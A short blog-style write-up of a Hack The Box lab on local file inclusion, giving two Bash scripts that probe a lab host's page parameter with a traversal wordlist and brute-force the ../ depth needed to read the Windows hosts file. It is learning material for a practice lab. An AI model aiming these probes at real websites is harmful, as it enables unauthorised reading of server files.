Website Enumeration with Bash
Note: The script has been made, but I'm working on a new version to post that will be more accessible.
#!/usr/bin/env bash
set -u  # treat unset variables as errors

# Base URL with the vulnerable parameter, and the traversal wordlist to try.
URL="unika.htb/index.php?page="
FILELIST="../dirbuster/Auto_Wordlists/wordlists/file_inclusion_windows.txt"

# Request each candidate path; responses without a PHP "Warning" suggest
# the include succeeded and something exists at that path.
while read -r page; do
    if ! curl -s "$URL$page" | grep -q "Warning"; then
        echo -e "\x1b[32;1m[ OK ]\x1b[0m $URL$page"
    else
        echo -e "\x1b[31;1m[FAIL]\x1b[0m $URL$page"
    fi
done < "$FILELIST"
This Bash script was written while doing a hackthebox.com introductory lab on local file inclusion and website enumeration.
I got stuck on the website enumeration portion and consulted the lab guide. It said that to progress, I needed to find hidden pages on the web server. The path you were supposed to append was
page=../../../../../../../../windows/system32/drivers/etc/hosts.
I felt this was not an intuitive conclusion to reach. How would I know how many directories back I needed to traverse to get to the system32 directory?
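One way to take the guesswork out of the depth is to brute-force it: keep adding ../ segments until the response no longer contains the PHP include warning. Here is a minimal sketch of that idea; the base URL and hosts-file path come from the lab, while the maximum depth of 15 is just an assumption I picked for illustration.

#!/usr/bin/env bash
set -u
# Probe increasing traversal depths until the hosts file is included
# without triggering a PHP "Warning" in the response.
BASE="unika.htb/index.php?page="
TARGET="windows/system32/drivers/etc/hosts"

for depth in $(seq 1 15); do
    # printf with %.0s repeats "../" once per argument from seq.
    payload="$(printf '../%.0s' $(seq 1 "$depth"))$TARGET"
    if ! curl -s "$BASE$payload" | grep -q "Warning"; then
        echo "Traversal works at depth $depth: $BASE$payload"
        break
    fi
done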
This is when I decided it would make more sense to automate the process with a script. I could feed it a wordlist and curl the unchanging part of the URL with each line from the wordlist appended to the end. The script would then grep the response for the word "Warning" and print out whether or not the URL returned one. URLs that did not return a warning would indicate there's something at that address.
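As a usage note, once the URL and FILELIST variables at the top are set, the script just runs as-is, and the hits can be filtered out of the noise with grep. The filename lfi_enum.sh below is only an example, not what the script is actually called.

chmod +x lfi_enum.sh
./lfi_enum.sh                 # full colour-coded output
./lfi_enum.sh | grep "OK"     # only the pages that did not return a Warning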